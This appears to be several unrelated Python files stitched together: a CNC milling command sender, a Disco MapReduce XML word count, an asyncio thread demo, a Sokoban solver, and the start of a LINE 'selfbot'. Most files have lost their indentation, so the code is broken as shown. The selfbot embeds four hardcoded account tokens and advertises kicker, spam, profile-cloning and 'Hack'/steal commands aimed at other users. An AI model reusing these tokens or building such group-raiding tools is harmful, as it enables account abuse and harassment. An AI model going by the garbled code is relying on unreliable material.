xpos = x; ypos = y; zpos = z;
xmax = max(x, xmax); ymax = max(y, ymax); zmax = max(z, zmax)
xmin = min(x, xmin); ymin = min(y, ymin); zmin = min(z, zmin)
cur_path.append((x, y, z))
except:
print "ignoring: %s" % cmd
pass
self.paths = paths
self.traverses = traverses
self.speed_feed = speeds
self.speed_plunge = speedz
self.xr = (xmin, xmax)
self.yr = (ymin, ymax)
self.zr = (zmin, zmax)
self.total_distance = total_distance
if self.total_distance == 0: self.total_distance = 1.0
self.total_time = total_time
if self.total_time == 0: self.total_time = 1.0
self.time_remaining = total_time
def start(self):
## Edit FB: we open the serial only when we start the thread
self.serial = serial.Serial(self.serialPort, baudrate=9600, rtscts=True, timeout=0)
self.running = True
self.time_start = time.time()
self.thread.start()
def abort(self):
if self.running and not self.done.isSet():
self.should_stop.set()
def thread_fn(self):
xmax, ymax, zmax = 0, 0, 0
xpos, ypos, zpos = 0, 0, 0
zup, zdown = 0, 0
speeds, speedz = 0.0, 0.0
with self.lock:
cmds = self.cmds
for cmd in cmds:
if self.target:
self.target.callback('progress', self)
cmd = cmd.strip()
if self.should_stop.isSet():
cmd="PA;PA;!VZ10;!PZ0,100;PU0,0;PD0,0;!MC0;"
self.serial.write(cmd)
self.serial.close()
self.aborted.set()
if self.target:
self.target.callback('done', self)
return
cmd=cmd.strip()
with self.lock:
self.current_cmd = cmd
self.cur_cmd_start = time.time()
self.cur_cmd_duration = 0.0
while (self.serial.getDSR() != True):
time.sleep(0.001)
self.serial.write(cmd)
try:
if cmd[:3] == "!PZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
zup = int(params[1])
zdown = int(params[0])
elif cmd[:2] == "VS":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
speeds = float(params[0])
with self.lock:
self.speed_feed = speeds
elif cmd[:3] == "!VZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
speedz = float(params[0])
with self.lock:
self.speed_plunge = speedz
elif cmd[:2] == "PU":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
if len(params) < 2:
continue
x = int(params[0])
y = int(params[1])
z = zup
d = dist(xpos, ypos, zpos, x, y, z)
t = d / RML_UNITS / SPEED_TRAVERSE
with self.lock:
self.cur_cmd_duration = t
self.time_remaining -= t
self.distance_milled += d
self.traverses_done.append(((xpos, ypos, zpos), (x, y, z)))
xpos = x; ypos = y; zpos = z;
elif cmd[:1] == "Z":
params = cmd[1:].split(',')
if len(params) < 2:
params = cmd[1:].split(' ')
x = int(params[0])
y = int(params[1])
z = int(params[2])
dist_xy = math.hypot(xpos-x, ypos-y) / RML_UNITS
                    dist_z = abs(zpos - z) / RML_UNITS  # abs: distance, not a signed delta
time_xy = dist_xy / speeds
time_z = dist_z / speedz
t = max(time_xy, time_z)
with self.lock:
self.cur_cmd_duration = t
self.time_remaining -= t
self.distance_milled += dist(xpos, ypos, zpos, x, y, z)
self.segments_done.append(((xpos, ypos, zpos), (x, y, z)))
xpos = x; ypos = y; zpos = z;
time.sleep(self.cur_cmd_duration)
except:
print "ignoring: %s" % cmd
self.done.set()
if self.target:
self.target.callback('done', self)
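# A short reference sketch (derived from the parser above) of the RML commands
# this sender understands; each command is semicolon-terminated and coordinates
# are in RML units (RML_UNITS = 40 per mm):
#   !PZ<down>,<up>   tool z positions          VS<speed>    xy feed speed (mm/s)
#   !VZ<speed>       z plunge speed (mm/s)     PU<x>,<y>    traverse (tool up)
#   Z<x>,<y>,<z>     cutting move to (x, y, z)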
|
xml_reader.py
|
import xml.sax
import threading
from Queue import Queue
from disco.core import Job, result_iterator
from disco.worker.classic.func import chain_reader
"""
To use this example, you should obtain an xml corpus and do the following:
1. Add the current directory to the python path
$ export PYTHONPATH=$PYTHONPATH:.
2. For the xml file, we will use a very small portion of wikipedia dump:
$ wget --no-check-certificate https://raw.githubusercontent.com/pooya/discostuff/master/sample.xml
(The actual wikipedia dump can be found here (very large file):
http://dumps.wikimedia.org/enwiki/latest/enwiki-latest-pages-articles.xml.bz2)
3. Use the xml_reader function in this file to extract the desired tags:
$ ddfs chunk data:xml:read ./sample.xml --reader xml_reader.xml_reader
for the wikipedia corpus, the desired tag is "text"
4. Then you can run any job that uses the content of this ddfs tag.
$ python xml_reader.py
"""
XML_TAG = "text"
DDFS_TAG = "data:xml:read"
QUEUE_SIZE = 8192
class ABContentHandler(xml.sax.ContentHandler):
def __init__(self, q):
xml.sax.ContentHandler.__init__(self)
self.q = q
def startElement(self, name, attrs):
self.tag = name
self.content = ""
def endElement(self, name):
if self.tag == XML_TAG:
self.q.put(self.content)
self.tag = ""
def characters(self, content):
if self.tag == XML_TAG:
self.content += content
class ReadProxy(object):
def __init__(self, stream, q):
self.stream = stream
self.buffer = ""
self.q = q
def read(self, size):
if self.buffer == "":
try:
self.buffer = self.stream.next()
except:
self.q.put(0)
return ""
if size < len(self.buffer):
buffer = self.buffer[:size]
self.buffer = self.buffer[size:]
return buffer
else:
return self._read()
def _read(self):
buffer = self.buffer
self.buffer = ""
return buffer
def xml_reader(stream, size, url, params):
q = Queue(QUEUE_SIZE)
xml_reader.rproxy = ReadProxy(stream, q)
threading.Thread(target=lambda q: xml.sax.parse(xml_reader.rproxy, ABContentHandler(q)),
args=(q,)).start()
while True:
item = q.get()
if item == 0:
return
yield item
q.task_done()
def map(line, params):
import __builtin__
unwanted = u",!.#()][{}-><=|/\"'*:?"
words = line.translate(__builtin__.dict.fromkeys([ord(x) for x in
unwanted], u" ")).lower()
for word in words.split():
yield word, 1
def reduce(iter, params):
from disco.util import kvgroup
for word, counts in kvgroup(sorted(iter)):
yield word, sum(counts)
if __name__ == '__main__':
job = Job().run(input=["tag://" + DDFS_TAG],
map=map,
reduce=reduce,
map_reader = chain_reader)
for line, count in result_iterator(job.wait(show=True)):
print(line, count)
|
96_ipc_asyncio-dev.py
|
# https://docs.python.org/zh-cn/3/library/asyncio-dev.html
# Debug mode
"""
There are several ways to enable asyncio debug mode:
1. Set the PYTHONASYNCIODEBUG environment variable to 1.
2. Use the -X dev Python command-line option.
3. Pass debug=True to asyncio.run().
4. Call loop.set_debug().
In addition to enabling debug mode, also consider:
1. Setting the log level of the asyncio logger to logging.DEBUG; for example, run this snippet at application startup:
   logging.basicConfig(level=logging.DEBUG)
2. Configuring the warnings module to display ResourceWarning warnings. One way is to use the -W default command-line option.
When debug mode is enabled:
1. asyncio checks for coroutines that were never awaited and logs them; this mitigates the "forgotten await" problem.
2. Many non-thread-safe asyncio APIs (such as the loop.call_soon() and loop.call_at() methods) raise an exception if called from the wrong thread.
3. The execution time of the I/O selector is logged if an I/O operation takes too long.
4. Callbacks that take longer than 100 ms are logged. The loop.slow_callback_duration attribute can be used to set, in seconds, the minimum execution duration that is considered "slow".
asyncio uses the logging module, and all logging is performed through the "asyncio" logger.
logging.getLogger("asyncio").setLevel(logging.WARNING)
"""
import asyncio
import threading
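# A minimal sketch of enabling debug mode via asyncio.run; defined as a
# function that is never called here, so the module-level demos below run
# unchanged:
def _debug_mode_demo():
    import logging
    import time
    logging.basicConfig(level=logging.DEBUG)
    async def blocking_step():
        # Blocking the loop is exactly what debug mode flags: steps slower
        # than loop.slow_callback_duration (default 0.1 s) are logged.
        time.sleep(0.2)
    asyncio.run(blocking_step(), debug=True)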
async def coro_func():
return await asyncio.sleep(1,result=42)
async def anther(loop):
# Later in another OS thread:
future = asyncio.run_coroutine_threadsafe(coro_func(), loop)
# Wait for the result:
result = future.result()
print(result)
def start_loop(loop):
    # Run the event loop; the loop is passed in as a parameter
    asyncio.set_event_loop(loop)
    loop.run_forever()
thread_loop = asyncio.new_event_loop()  # create an event loop
run_loop_thread = threading.Thread(target=start_loop, args=(thread_loop,))  # run the loop in a new thread so the main thread is not blocked
run_loop_thread.start()  # start the thread, i.e. run the coroutine event loop
loop = asyncio.new_event_loop()  # asyncio.ProactorEventLoop() # asyncio.get_event_loop()
asyncio.run(anther(thread_loop))  # loop.run_until_complete(anther(thread_loop))
# anther() must be given the loop that runs in the thread
import asyncio
from threading import Thread
async def create_task(event_loop):
    i = 0
    while True:
        # Produce one task per second and submit it to the loop running in the thread; event_loop is passed as a parameter
        asyncio.run_coroutine_threadsafe(production(i), event_loop)
        await asyncio.sleep(1)
        i += 1
async def production(i):
    while True:
        print("coroutine task #{}".format(i))
        await asyncio.sleep(1)
def start_loop(loop):
    # Run the event loop; the loop is passed in as a parameter
    asyncio.set_event_loop(loop)
    loop.run_forever()
thread_loop = asyncio.new_event_loop()  # create an event loop
run_loop_thread = Thread(target=start_loop, args=(thread_loop,))  # run the loop in a new thread so the main thread is not blocked
run_loop_thread.start()  # start the thread, i.e. run the coroutine event loop
main_loop = asyncio.new_event_loop()
main_loop.run_until_complete(create_task(thread_loop))  # the main thread is responsible for creating coroutine objects
|
Solver.py
|
import numpy as np
import hashlib
import copy
import datetime
import threading
# Notation: [ROW][COL]
# Note: Add Forbidden Cells to improve the efficiency
# Check duplicate state in the search tree, keep DEPTH info
# Add Progress Monitoring
# ?Store Search Nodes for next batch
# ?Add Heuristic Move
# ?Multithreading
# ?Save Node while max steps/depths exceeded
# DEFINE:
# map[][]:
# -1: WALL
# -2: BOX
# -3: PLAYER
# -9: BLANK
MAP_BLANK = -9
MAX_STEP_COUNT_LST_SIZE = 256
MAX_STEPS = 28
MAX_DEPTH = 6
MAP_ROW = 8
MAP_COL = 8
FORBIDDEN = [[1,4],[1,5],[2,1],[3,1],[4,6],[5,6],[7,2],[7,3]]
g_para_total_state_searched = 0
g_para_max_exceeded = 0
g_para_duplicate_state_count = 0
g_para_duplicate_state_count2 = 0
g_progress = 0.0
g_progress_prv_time = datetime.datetime.now()
g_tm_CountSteps2 = datetime.timedelta(0)
g_lst_1 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='u2')
g_lst_2 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='u2')
g_para_tm_start = datetime.datetime.now()
g_para_tm_diff = datetime.timedelta(0)
def isNotForbidden( pos):
return ( pos not in FORBIDDEN )
def g_tm_start():
global g_para_tm_start
g_para_tm_start = datetime.datetime.now()
def g_tm_add():
global g_para_tm_start
global g_para_tm_diff
g_para_tm_diff += datetime.datetime.now() - g_para_tm_start
def g_tm_print( func_name):
global g_para_tm_diff
print( "Time Diff ({}): {}".format(func_name, g_para_tm_diff))
class STATE:
def __init__( self):
pass
def setup( self, mapstr):
i=-1
j=0
box=[]
wall=[]
for c in mapstr:
if( c=='#'):
i=i+1
j=0
continue
if( c=='P'):
player = [i,j]
j=j+1
continue
if( c=='W'):
wall.append([i,j])
j=j+1
continue
if( c=='B'):
box.append([i,j])
j=j+1
continue
j=j+1
self.set_wall( wall)
self.set_box( box)
self.set_player( player)
#print( self._player)
#print( self._wall)
#print( self._box)
def set_goal( self, lst):
self._goal = np.array( lst, dtype='b')
def set_box( self, lst):
self._box = np.array( lst, dtype='b')
def set_player( self, pos):
self._player = np.array( pos, dtype='b')
def set_wall( self, lst):
self._wall = np.array( lst, dtype='b')
def get_hexdigest( self):
m = hashlib.sha256()
m.update( self._player.tobytes())
#TODO: possible different orders for same positions of boxes
m.update( self._box.tobytes())
return m.hexdigest()
# print( "Move Box:", box_no, "Steps:", steps, "Dir:", mov_dir)
def moveBox( self, box_no, mov_dir):
self._player[0] = self._box[box_no][0]
self._player[1] = self._box[box_no][1]
self._box[box_no,0] += mov_dir[0]
self._box[box_no,1] += mov_dir[1]
def matchGoal( self, goal):
for elem in self._box:
if( [elem[0],elem[1]] not in goal):
return False
return True
def CountSteps2( map, state):
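    # Breadth-first flood fill from the player's position: each reachable blank
    # square in map is stamped with the number of steps needed to reach it
    # (walls/boxes stay negative); the player's own square is set to 0 at the end.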
global g_tm_CountSteps2
tm_tmp = datetime.datetime.now()
i=1
lst = [[state._player[0],state._player[1]]]
while( len(lst) ):
next_lst = []
#print("step:", i)
for x,y in lst:
if( map[x-1,y]== MAP_BLANK): #UP
map[x-1,y] = i
next_lst.append([x-1,y])
if( map[x+1,y]== MAP_BLANK): #DOWN
map[x+1,y] = i
next_lst.append([x+1,y])
if( map[x,y-1]== MAP_BLANK): #LEFT
map[x,y-1] = i
next_lst.append([x,y-1])
if( map[x,y+1]== MAP_BLANK): #RIGHT
map[x,y+1] = i
next_lst.append([x,y+1])
lst = next_lst
#print( lst)
i=i+1
pass
map[state._player[0],state._player[1]] = 0
g_tm_CountSteps2 += datetime.datetime.now() - tm_tmp
pass
def CountSteps( map, state):
#print( state.get_hexdigest())
#map2 = map.copy()
# Add BOX, PLAYER to map
for val in state._box:
map[val[0],val[1]]= -2
map[state._player[0],state._player[1]] = -3
#print( map)
CountSteps2( map, state)
pass
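# Usage sketch (hypothetical helper, for documentation): after CountSteps,
# m[x, y] >= 0 is the BFS step count from the player to the reachable cell
# (x, y), 0 at the player's own square; negative codes still mark walls/boxes.
def _demo_count_steps(state):
    m = np.full((MAP_ROW, MAP_COL), fill_value=MAP_BLANK, dtype='b')
    for w in state._wall:
        m[w[0], w[1]] = -1
    CountSteps(m, state)
    return m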
def SearchEligibleMoves( map, state, moves, log):
i= -1
# Try to move the same box first
if(len(log)):
i = log[-1][0] # last moved box_no
#lst_mov_dir = log[-1][2]
x, y = state._box[i]
_U = map[x-1,y]
_D = map[x+1,y]
_L = map[x,y-1]
_R = map[x,y+1]
if( _U>=0 and _D>=0 ): #UP/DOWN
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
else:
if( _U== MAP_BLANK and _D>=0 ): #UP
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( _U>=0 and _D== MAP_BLANK ): #DOWN
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
if( _L>=0 and _R>=0): #LEFT/RIGHT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
else:
if( _L== MAP_BLANK and _R>=0): #LEFT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( _L>=0 and _R== MAP_BLANK): #RIGHT
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
j=i
for i, elem in enumerate( state._box):
if(j==i):
continue
x, y = elem
_U = map[x-1,y]
_D = map[x+1,y]
_L = map[x,y-1]
_R = map[x,y+1]
if( _U>=0 and _D>=0 ): #UP/DOWN
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
else:
if( _U== MAP_BLANK and _D>=0 ): #UP
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( _U>=0 and _D== MAP_BLANK ): #DOWN
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
if( _L>=0 and _R>=0): #LEFT/RIGHT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
else:
if( _L== MAP_BLANK and _R>=0): #LEFT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( _L>=0 and _R== MAP_BLANK): #RIGHT
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
pass
def Solve( state, goal):
# map : WALLS ONLY
# map = np.zeros((MAP_ROW, MAP_COL),dtype='b')
map = np.full((MAP_ROW, MAP_COL), fill_value=MAP_BLANK, dtype='b')
for val in state._wall:
map[val[0],val[1]]= -1
trace = {}
log = []
if( not Solve2( map, state, goal, 0, 0, trace, log, 100.0)):
print( "Cannot Solve!")
global g_para_total_state_searched
g_para_total_state_searched = len(trace)
def Solve2( map, state, goal, depth, total_steps, trace, log, progress_slot):
if( total_steps> MAX_STEPS or depth> MAX_DEPTH):
global g_para_max_exceeded
g_para_max_exceeded += 1
output_progress( progress_slot) # END_NODE
return False
# map2 : WALLS plus STEP COUNT
map2 = map.copy()
#Count steps to reachable blank squares
CountSteps( map2, state)
#print( map2)
#Remove illegible moves for the BOX
moves=[] # list of [ targetPlayerPosition, moveDirection, steps, box no]
SearchEligibleMoves( map2, state, moves, log)
#print(moves)
if( len(moves)):
mv_progress_slot = progress_slot/len(moves)
else:
output_progress( progress_slot) # END_NODE
#Try each possible move
for i_mov, mov in enumerate(moves):
#if( depth<2): print( depth, mov, mv_progress_slot)
steps = mov[2]
box_no = mov[3]
mov_dir = mov[1]
g_tm_start()
new_state = copy.deepcopy(state)
g_tm_add()
new_state.moveBox( box_no, mov_dir)
#print( box_no, mov_dir)
#check if meet goal
if( new_state.matchGoal(goal)):
print( "Reach Goals!")
print( "Depth:", depth+1)
print( "Total Steps:", total_steps+steps+1)
log.append([box_no, steps, mov_dir, i_mov])
for l in log:
print( " Move Box: {:d} Steps: {:d} Dir: {} i: {}".format(l[0],l[1],l[2],l[3]))
return True
#check if new_state is duplicate
key = new_state.get_hexdigest()
if( key in trace):
#print( "duplicate state!")
global g_para_duplicate_state_count
global g_para_duplicate_state_count2
g_para_duplicate_state_count += 1
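            # prune only when this state was already reached at a shallower
            # depth; otherwise re-expand it and record the shallower depth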
if( trace[key] < depth+1):
g_para_duplicate_state_count2 += 1
output_progress( mv_progress_slot) # END_NODE
continue
log.append([box_no, steps, mov_dir, i_mov])
trace[key] = depth+1
#print( new_state.get_hexdigest())
#start a new node for search
if( Solve2( map, new_state, goal, depth+1, total_steps+steps+1, trace, log, mv_progress_slot)):
return True
#log.pop()
#continue #Find next alternative solution
else:
log.pop()
#output_progress( mv_progress_slot)
#trace.pop(key)
continue
return False
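# Usage sketch: Solve() is the entry point; it builds the walls-only map, then
# Solve2() runs a depth-first search over box pushes, pruned by MAX_STEPS and
# MAX_DEPTH and by the `trace` hash of visited states.
#   s = STATE(); s.setup(mapstr); Solve(s, goal)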
def output_progress( progress):
global g_progress
global g_progress_prv_time
g_progress += progress
tmp = datetime.datetime.now()
if( tmp - g_progress_prv_time > datetime.timedelta(seconds=2.0)):
print( "progress: {:.4f}%".format(g_progress))
g_progress_prv_time = tmp
s = STATE()
mapstr = "#---WWWW-"+"#WWWW PW-"+"#W B W-"+"#W B WW"+"#WWB B W"+"#-W B W"+"#-W WWWW"+"#-WWWW---"
goal = [[3,3],[3,4],[3,5],[4,4],[4,5]]
goal = [[3,4],[3,2],[4,2],[4,4],[5,4]] # one step
MAX_STEPS = 21
MAX_DEPTH = 5
goal = [[2,5],[3,2],[4,2],[4,4],[5,4]] # one step
# goal = [[3,5],[3,2],[4,2],[4,4],[5,4]] # two steps
# goal = [[3,5],[3,2],[4,2],[4,4],[5,3]] # two steps
# MAX_STEPS = 21
# MAX_DEPTH = 4
# goal = [[3,5],[3,3],[4,2],[4,4],[5,3]]
# goal = [[3,4],[3,3],[4,2],[4,4],[5,5]] # two steps
# goal = [[3,4],[3,3],[4,2],[4,3],[5,5]] # two steps
# goal = [[3,4],[3,3],[3,2],[4,3],[5,5]] # two steps
# Time Used:0:00:01.915810
# MAX_STEPS = 28
# MAX_DEPTH = 6
# goal = [[3,4],[3,3],[2,2],[4,3],[5,5]]
# Time Used: 0:00:17.317066
# Time Used (g_tm_CountSteps2): 0:00:05.415582
# Total State Searched: 18628
# Total Max Exceeded: 111053
# Duplicate Key Count : 156954
# Duplicate Key Count2: 26714
MAX_STEPS = 31
MAX_DEPTH = 8
goal = [[3,4],[3,3],[2,4],[4,3],[5,5]]
# Time Used: 0:00:46.802952
# Time Used (g_tm_CountSteps2): 0:00:15.552429
# Total State Searched: 33324
# Total Max Exceeded: 276172
# Duplicate Key Count : 426214
# Duplicate Key Count2: 79402
# MAX_STEPS = 32
# MAX_DEPTH = 9
# goal = [[3,4],[3,3],[2,5],[4,3],[5,5]]
# Time Used: 0:01:46.428706
# Time Used (g_tm_CountSteps2): 0:00:34.125447
# Total State Searched: 53777
# Total Max Exceeded: 553840
# Duplicate Key Count : 941157
# Duplicate Key Count2: 202331
# Time Diff (STATE Copy): 0:00:15.649496
MAX_STEPS = 33
MAX_DEPTH = 10
goal = [[4,4],[3,3],[2,5],[4,3],[5,5]]
# Time Used: 0:21:59.884430
# Time Used (g_tm_CountSteps2): 0:07:51.087651
# Total State Searched: 184658
# Total Max Exceeded: 4987044
# Duplicate Key Count : 11314176
# Duplicate Key Count2: 3603415
# MAX_STEPS = 40
# MAX_DEPTH = 13
# goal = [[4,4],[3,3],[2,5],[4,3],[5,2]]
# # Time Used:
# MAX_STEPS = 45
# MAX_DEPTH = 16
# goal = [[4,4],[3,3],[2,5],[4,3],[2,2]]
# # Time Used:
# MAX_STEPS = 46
# MAX_DEPTH = 17
# goal = [[4,4],[3,4],[2,5],[4,3],[2,2]]
# # Time Used:
# MAX_STEPS = 52
# MAX_DEPTH = 19
# goal = [[4,4],[3,4],[4,5],[4,3],[2,2]]
# # Time Used:
# MAX_STEPS = 61
# MAX_DEPTH = 20
# goal = [[4,4],[3,4],[4,5],[3,3],[2,2]]
# # Time Used:
# MAX_STEPS = 71
# MAX_DEPTH = 24
# goal = [[4,4],[3,4],[4,5],[3,3],[3,5]]
s.setup( mapstr)
g_progress_prv_time = datetime.datetime.now()
start_time = datetime.datetime.now()
if True:
Solve( s, goal)
else:
x = threading.Thread( target=Solve, args=(s,goal))
x.start()
x.join()
diff_time = datetime.datetime.now() - start_time
print( "Time Used: {}".format(diff_time))
print( "Time Used (g_tm_CountSteps2): {}".format(g_tm_CountSteps2))
print( "Total State Searched: {}".format(g_para_total_state_searched))
print( "Total Max Exceeded: {}".format(g_para_max_exceeded))
print( "Duplicate Key Count : {}".format(g_para_duplicate_state_count))
print( "Duplicate Key Count2: {}".format(g_para_duplicate_state_count2))
g_tm_print("STATE Copy")
# Setup Map and State:{ Goal, Box, Player, Wall }
# Logs:
# Time Used:0:29:37.108837
# Total State Searched: 184,658
# Duplicate Key Count : 11,319,687
# Duplicate Key Count2: 3,602,166
# MAX_STEPS = 40
# MAX_DEPTH = 13
# goal = [[4,4],[3,3],[2,5],[4,3],[5,2]]
# Depth: 13
# Total Steps: 40
# Move Box: 0 Steps: 1 Dir: [1, 0] i: 0
# Move Box: 4 Steps: 4 Dir: [0, 1] i: 6
# Move Box: 1 Steps: 7 Dir: [0, 1] i: 3
# Move Box: 3 Steps: 6 Dir: [0, -1] i: 2
# Move Box: 2 Steps: 3 Dir: [-1, 0] i: 2
# Move Box: 2 Steps: 0 Dir: [-1, 0] i: 0
# Move Box: 2 Steps: 2 Dir: [0, 1] i: 0
# Move Box: 2 Steps: 0 Dir: [0, 1] i: 1
# Move Box: 2 Steps: 0 Dir: [0, 1] i: 1
# Move Box: 0 Steps: 0 Dir: [1, 0] i: 2
# Move Box: 4 Steps: 4 Dir: [0, -1] i: 5
# Move Box: 4 Steps: 0 Dir: [0, -1] i: 0
# Move Box: 4 Steps: 0 Dir: [0, -1] i: 0
|
botai2.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, ctypes, urllib, urllib2, urllib3, wikipedia, tempfile, shutil
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EvyRA6uk6WO6OANNneCf.zsjptOGse28bSLj1PuTA7W.69J4S3XwOhfQOzyc/cz+oEZe9uGJfYCWIjHzdfhmM9o=')
cl.loginResult()
print "Cl-Login Success\n"
ki1 = LINETCR.LINE()
#ki1.login(qr=True)
ki1.login(token='Ev69mxc1xsPI0PZv3rR3.ceM9NaolFHDUaV2+G8nZyW.dIMEwUnTtabrS/gHoTpPKbYx6n8OTe3HiHY4S5d8LMM=')
ki1.loginResult()
print "Ki-Login Success\n"
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='EvkhBZPTCc1GtMyB3BV7.L9FHe7uzKTCG1RQIn1TiTW.yAaZhULyuBUQXshDpj0fBDPXGADVV+KBoYvlT5/IPWk=')
ki2.loginResult()
print "Kk-Login Success\n"
ki10 = LINETCR.LINE()
#ki10.login(qr=True)
ki10.login(token='EveDBXagKElQaY3wLBT7.zHaODuDXU8bfbqzFy+szXW.NfYuKFYnbskfXDh69vYhjmP3ZDACQuw00qrTCSAHqcE=')
ki10.loginResult()
print "Kc-Login Success\n"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 1 ☬]
╚══════════════════
╔═════════════════════
║☬➣『คท』
║☬➣『เปิด คท』
║☬➣『ปิด คท』
║☬➣『#คท』 ไวรัส คท
║☬➣『คท @』
║☬➣『ไอดี』
║☬➣『ไอดีกลุ่ม ทั้งหมด:』
║☬➣『Mid』
║☬➣『Mid @』
║☬➣『Allmid』
║☬➣『Mc:』
║☬➣『Gift,แจก』
║☬➣『คิก1 -- คิก10 แจก』
║☬➣『Mid @』
║☬➣『Cn: 』 ตั้งชื่อ
║☬➣『ตั้งชื่อ: 』ตั้งชื่อ นาฬิกา
║☬➣『เปิด นาฬิกา』
║☬➣『ปิด นาฬิกา』
║☬➣『กลุ่ม』
║☬➣『Tl: text』
║☬➣『Tx:』 สร้างชื่อไวรัส
║☬➣『ออน』เช็คเวลา ออนไลน์
║☬➣『เปิด ดึงกลับ』
║☬➣『ปิด ดึงกลับ』
║☬➣『เปิด เข้ากลุ่ม』
║☬➣『ปิด เข้ากลุ่ม』
║☬➣『เปิด เพิ่มเพื่อน』
║☬➣『ปิด เพิ่มเพื่อน』
║☬➣『เปิด ออกแชท』
║☬➣『ปิด ออกแชท』
║☬➣『เปิด แชร์』
║☬➣『ปิด แชร์』
║☬➣『Add message: text』
║☬➣『Message:』
║☬➣『คอมเม้น: 』
║☬➣『เปิด คอมเม้น』
║☬➣『ปิด คอมเม้น』
║☬➣ 『เวลา』เช็ค วัน - เวลา
║☬➣『ยูทูป 』
║☬➣『ขอเพลง』
║☬➣『siri:』
║☬➣『Siri-en』
║☬➣『พูด』
║☬➣『/พูด』 คิกเกอพูดตาม
║☬➣ 『/ 』 สติกเกอร์
║☬➣ 『ลบแชต』REMOVCHAT
║☬➣『ลบรัน』
║☬➣『คิก1 -- คิก10 ลบรัน』
║☬➣『Log-in / ขอลิ้ง』
║☬➣『ลบ』
║☬➣『 . 』
║☬➣『ประกาศ:』
║☬➣『ผู้สร้าง』
║☬➣『ผู้สร้างกลุ่ม』
║☬➣『ทีมงาน』
║☬➣『รีบอท / รีบูต』
║☬➣『รีคิก』
╚═════════════════════
──┅═✥===========✥═┅──
╔═════════════════════
║ [By.☬ARIFISTIFIK☬]
║ ติดต่อ [LINE ID : 4545272]
╚═════════════════════
ลิ้ง: http://line.me/ti/p/arif.mh
──┅═✥===========✥═┅──
"""
helpMessage2 ="""
╔═════════════════════
║ [SELF BOT]
║[By.☬ARIFISTIFIK☬]
╚═════════════════════
╔══════════════════
║ [☬ ชุดคำสั่ง ที่ 2 ☬]
╚══════════════════
╔═════════════════════
║☬➣『บอท』
║☬➣『#บอท』
║☬➣『คิกมา』
║☬➣『คิกออก』
║☬➣『คิก1--10』 คิกเกอร์เข้า
║☬➣『บิน』 คำสั่งบิน
║☬➣『 Nk: 』
║☬➣『Kill』
║☬➣『เทส』
║☬➣『ยกเชิญ』
║☬➣『Cancel』
║☬➣『เปิด ลิ้ง』
║☬➣『ปิด ลิ้ง』
║☬➣『เปิด เชิญ』
║☬➣『ปิด เชิญ』
║☬➣『เชิญ』
║☬➣『ลิ้ง』
║☬➣『Spam on/off』
║☬➣『รูปกลุ่ม』
║☬➣『#ดึงรูป』
║☬➣『Gurl』
║☬➣『Vps』
║☬➣『เชคค่า』
║☬➣『แทค』
║☬➣『เปิดหมด』
║☬➣『ปิดหมด』
║☬➣『แบน』
║☬➣『ลบแบน』
║☬➣『แบน @』
║☬➣『ลบแบน @』
║☬➣『ล้างดำ』
║☬➣『Cb』
║☬➣『Bl』
║☬➣『สั่งดำ @』
║☬➣『เปิด อ่าน』
║☬➣『ปิด อ่าน』
║☬➣『ลิสกลุ่ม』
║☬➣『Gcancel: 』
║☬➣『Gcancel on/off』
║☬➣『แปลงร่าง @』
║☬➣『กลับร่าง』
║☬➣『คิกทั้งหมด @』
║☬➣『คิก1- 10 แปลงร่าง @』
║☬➣『คิก คืนร่าง』
║☬➣『ตั้งเวลา』
║☬➣『.ใครอ่าน』
║☬➣『เพื่อน』
║☬➣『#เพื่อน』
║☬➣『บล็อค』
║☬➣『เปิด ล็อคชื่อ』
║☬➣『ปิด ล็อคชื่อ』
║☬➣『เปิด ป้องกัน』
║☬➣『ปิดป้องกัน』
║☬➣ 『รูป』 รูปเรา
║☬➣ 『ปก』 รูแปก เรา
║☬➣ 『โปรวีดีโอ』 วีดีโอโปร เรา
║☬➣ 『ตัส』 ตัสเรา
║☬➣ 『ลิ้งรูป』 ลิ้งรูปเรา
║☬➣ 『ลิ้งปก』 ลิ้งปกเรา
║☬➣ 『Hack @』ขโมย คท + Mid
║☬➣ 『/รูป @』 ขโมย รูป
║☬➣ 『/ปก @』 ขโมย รูปปก
║☬➣ 『/ตัส @』 ขโมย ตัส
║☬➣ 『เชคหมด』เชครูป ปก ตัส
║☬➣『Sk』
║☬➣『Sp』
║☬➣『Bot Speed』
║☬➣『Key』
